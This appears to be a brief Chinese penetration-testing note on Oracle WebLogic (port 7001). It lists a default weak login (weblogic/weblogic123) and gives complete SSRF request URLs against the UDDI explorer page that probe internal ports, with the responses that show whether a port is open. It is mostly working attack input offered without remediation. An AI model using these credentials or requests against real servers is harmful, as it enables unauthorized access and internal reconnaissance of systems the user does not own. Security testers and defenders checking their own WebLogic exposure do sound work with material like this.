0x01 Weblogic中间件弱口令漏洞 端口:7001用户名:密码 weblogic weblogic123
0x02 Weblogic中间件SSRF漏洞
访问 :7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回which did not have a valid SOAP content-type: unknown/unknown.说明127.0.0.1主机的22端口开放
访问 :7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 返回Connection refused.说明127.0.0.1主机的23端口未开放